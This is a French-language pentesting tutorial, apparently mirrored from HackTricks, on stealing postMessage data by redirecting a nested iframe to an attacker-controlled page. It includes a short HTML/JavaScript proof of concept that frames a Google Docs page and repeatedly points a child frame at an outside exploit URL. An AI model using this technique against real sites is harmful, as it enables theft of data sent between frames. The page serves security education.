Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
Translator workflow af42105553 Translated to French
2023-06-03 13:10:46 +00:00

4.5 KiB
Raw Blame History

Vol de postmessage en modifiant l'emplacement de l'iframe

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Modification des emplacements des iframes enfants

Selon cet article, si vous pouvez inclure une page web dans une iframe sans en-tête X-Frame, qui contient une autre iframe, vous pouvez modifier l'emplacement de cette iframe enfant.

Par exemple, si abc.com a efg.com comme iframe et que abc.com n'a pas d'en-tête X-Frame, je pourrais changer efg.com en evil.com en utilisant frames.location.

Cela est particulièrement utile dans les postMessages car si une page envoie des données sensibles en utilisant un joker comme windowRef.postmessage("","*"), il est possible de modifier l'emplacement de l'iframe associée (enfant ou parent) vers un emplacement contrôlé par un attaquant et de voler ces données.

<html>
    <iframe src="https://docs.google.com/document/ID" />
    <script>
       //pseudo code
        setTimeout(function(){ exp(); }, 6000);

        function exp(){
          //needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created 
          setInterval(function(){ 
              window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
          }, 100);
        }
    </script>
</html>
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥